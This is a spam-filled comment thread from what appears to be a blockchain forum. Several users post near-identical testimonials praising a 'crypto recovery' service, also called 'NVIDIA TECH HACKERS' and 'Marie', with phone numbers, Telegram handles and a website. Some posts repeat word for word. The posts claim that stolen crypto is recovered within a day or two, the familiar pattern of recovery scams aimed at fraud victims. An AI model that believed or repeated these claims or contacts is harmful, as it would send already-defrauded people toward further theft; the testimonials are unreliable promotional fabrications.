hacking, and cybersecurity concerns. You reach them Call/Text Number +1 (336)390-6684 His Email: [email protected] Contact Telegram: @Capitalcryptorecover Via Contact: [email protected] His website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 14.10.25 01:15 tyleradams

    Hi. Please be wise, do not make the same mistake I had made in the past, I was a victim of bitcoin scam, I saw a glamorous review showering praises and marketing an investment firm, I reached out to them on what their contracts are, and I invested $28,000, which I was promised to get my first 15% profit in weeks, when it’s time to get my profits, I got to know the company was bogus, they kept asking me to invest more and I ran out of patience then requested to have my money back, they refused to answer nor refund my funds, not until a friend of mine introduced me to the NVIDIA TECH HACKERS, so I reached out and after tabling my complaints, they were swift to action and within 36 hours I got back my funds with the due profit. I couldn’t contain the joy in me. I urge you guys to reach out to NVIDIA TECH HACKERS on their email: [email protected]

  • 14.10.25 08:46 robertalfred175

    CRYPTO SCAM RECOVERY SUCCESSFUL – A TESTIMONIAL OF LOST PASSWORD TO YOUR DIGITAL WALLET BACK. My name is Robert Alfred, Am from Australia. I’m sharing my experience in the hope that it helps others who have been victims of crypto scams. A few months ago, I fell victim to a fraudulent crypto investment scheme linked to a broker company. I had invested heavily during a time when Bitcoin prices were rising, thinking it was a good opportunity. Unfortunately, I was scammed out of $120,000 AUD and the broker denied me access to my digital wallet and assets. It was a devastating experience that caused many sleepless nights. Crypto scams are increasingly common and often involve fake trading platforms, phishing attacks, and misleading investment opportunities. In my desperation, a friend from the crypto community recommended Capital Crypto Recovery Service, known for helping victims recover lost or stolen funds. After doing some research and reading multiple positive reviews, I reached out to Capital Crypto Recovery. I provided all the necessary information—wallet addresses, transaction history, and communication logs. Their expert team responded immediately and began investigating. Using advanced blockchain tracking techniques, they were able to trace the stolen Dogecoin, identify the scammer’s wallet, and coordinate with relevant authorities to freeze the funds before they could be moved. Incredibly, within 24 hours, Capital Crypto Recovery successfully recovered the majority of my stolen crypto assets. I was beyond relieved and truly grateful. Their professionalism, transparency, and constant communication throughout the process gave me hope during a very difficult time. If you’ve been a victim of a crypto scam, I highly recommend them with full confidence contacting: 📧 Email: [email protected] 📱 Telegram: @Capitalcryptorecover Contact: [email protected] 📞 Call/Text: +1 (336) 390-6684 🌐 Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 14.10.25 08:46 robertalfred175

    CRYPTO SCAM RECOVERY SUCCESSFUL – A TESTIMONIAL OF LOST PASSWORD TO YOUR DIGITAL WALLET BACK. My name is Robert Alfred, Am from Australia. I’m sharing my experience in the hope that it helps others who have been victims of crypto scams. A few months ago, I fell victim to a fraudulent crypto investment scheme linked to a broker company. I had invested heavily during a time when Bitcoin prices were rising, thinking it was a good opportunity. Unfortunately, I was scammed out of $120,000 AUD and the broker denied me access to my digital wallet and assets. It was a devastating experience that caused many sleepless nights. Crypto scams are increasingly common and often involve fake trading platforms, phishing attacks, and misleading investment opportunities. In my desperation, a friend from the crypto community recommended Capital Crypto Recovery Service, known for helping victims recover lost or stolen funds. After doing some research and reading multiple positive reviews, I reached out to Capital Crypto Recovery. I provided all the necessary information—wallet addresses, transaction history, and communication logs. Their expert team responded immediately and began investigating. Using advanced blockchain tracking techniques, they were able to trace the stolen Dogecoin, identify the scammer’s wallet, and coordinate with relevant authorities to freeze the funds before they could be moved. Incredibly, within 24 hours, Capital Crypto Recovery successfully recovered the majority of my stolen crypto assets. I was beyond relieved and truly grateful. Their professionalism, transparency, and constant communication throughout the process gave me hope during a very difficult time. If you’ve been a victim of a crypto scam, I highly recommend them with full confidence contacting: 📧 Email: [email protected] 📱 Telegram: @Capitalcryptorecover Contact: [email protected] 📞 Call/Text: +1 (336) 390-6684 🌐 Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 14.10.25 08:46 robertalfred175

    CRYPTO SCAM RECOVERY SUCCESSFUL – A TESTIMONIAL OF LOST PASSWORD TO YOUR DIGITAL WALLET BACK. My name is Robert Alfred, Am from Australia. I’m sharing my experience in the hope that it helps others who have been victims of crypto scams. A few months ago, I fell victim to a fraudulent crypto investment scheme linked to a broker company. I had invested heavily during a time when Bitcoin prices were rising, thinking it was a good opportunity. Unfortunately, I was scammed out of $120,000 AUD and the broker denied me access to my digital wallet and assets. It was a devastating experience that caused many sleepless nights. Crypto scams are increasingly common and often involve fake trading platforms, phishing attacks, and misleading investment opportunities. In my desperation, a friend from the crypto community recommended Capital Crypto Recovery Service, known for helping victims recover lost or stolen funds. After doing some research and reading multiple positive reviews, I reached out to Capital Crypto Recovery. I provided all the necessary information—wallet addresses, transaction history, and communication logs. Their expert team responded immediately and began investigating. Using advanced blockchain tracking techniques, they were able to trace the stolen Dogecoin, identify the scammer’s wallet, and coordinate with relevant authorities to freeze the funds before they could be moved. Incredibly, within 24 hours, Capital Crypto Recovery successfully recovered the majority of my stolen crypto assets. I was beyond relieved and truly grateful. Their professionalism, transparency, and constant communication throughout the process gave me hope during a very difficult time. If you’ve been a victim of a crypto scam, I highly recommend them with full confidence contacting: 📧 Email: [email protected] 📱 Telegram: @Capitalcryptorecover Contact: [email protected] 📞 Call/Text: +1 (336) 390-6684 🌐 Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 15.10.25 18:07 crypto

    Cryptocurrency's digital realm presents many opportunities, but it also conceals complex frauds. It is quite painful to lose your cryptocurrency to scam. You can feel harassed and lost as a result. If you have been the victim of a cryptocurrency scam, this guide explains what to do ASAP. Following these procedures will help you avoid further issues or get your money back. Communication with Marie ([email protected] and WhatsApp: +1 7127594675) can make all the difference.

  • 15.10.25 21:52 harristhomas7376

    "In the crypto world, this is great news I want to share. Last year, I fell victim to a scam disguised as a safe investment option. I have invested in crypto trading platforms for about 10yrs thinking I was ensuring myself a retirement income, only to find that all my assets were either frozen, I believed my assets were secure — until I discovered that my BTC funds had been frozen and withdrawals were impossible. It was a devastating moment when I realized I had been scammed, and I thought my Bitcoin was gone forever, Everything changed when a close friend recommended the Capital Crypto Recover Service. Their professionalism, expertise, and dedication enabled me to recover my lost Bitcoin funds back — more than €560.000 DEM to my BTC wallet. What once felt impossible became a reality thanks to their support. If you have lost Bitcoin through scams, hacking, failed withdrawals, or similar challenges, don’t lose hope. I strongly recommend Capital Crypto Recover Service to anyone seeking a reliable and effective solution for recovering any wallet assets. They have a proven track record of successful reputation in recovering lost password assets for their clients and can help you navigate the process of recovering your funds. Don’t let scammers get away with your hard-earned money – contact Email: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Contact: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

  • 15.10.25 21:52 harristhomas7376

    "In the crypto world, this is great news I want to share. Last year, I fell victim to a scam disguised as a safe investment option. I have invested in crypto trading platforms for about 10yrs thinking I was ensuring myself a retirement income, only to find that all my assets were either frozen, I believed my assets were secure — until I discovered that my BTC funds had been frozen and withdrawals were impossible. It was a devastating moment when I realized I had been scammed, and I thought my Bitcoin was gone forever, Everything changed when a close friend recommended the Capital Crypto Recover Service. Their professionalism, expertise, and dedication enabled me to recover my lost Bitcoin funds back — more than €560.000 DEM to my BTC wallet. What once felt impossible became a reality thanks to their support. If you have lost Bitcoin through scams, hacking, failed withdrawals, or similar challenges, don’t lose hope. I strongly recommend Capital Crypto Recover Service to anyone seeking a reliable and effective solution for recovering any wallet assets. They have a proven track record of successful reputation in recovering lost password assets for their clients and can help you navigate the process of recovering your funds. Don’t let scammers get away with your hard-earned money – contact Email: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Contact: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

Для участия в Чате вам необходим бесплатный аккаунт pro-blockchain.com Войти Регистрация
Есть вопросы?
С вами на связи 24/7
Help Icon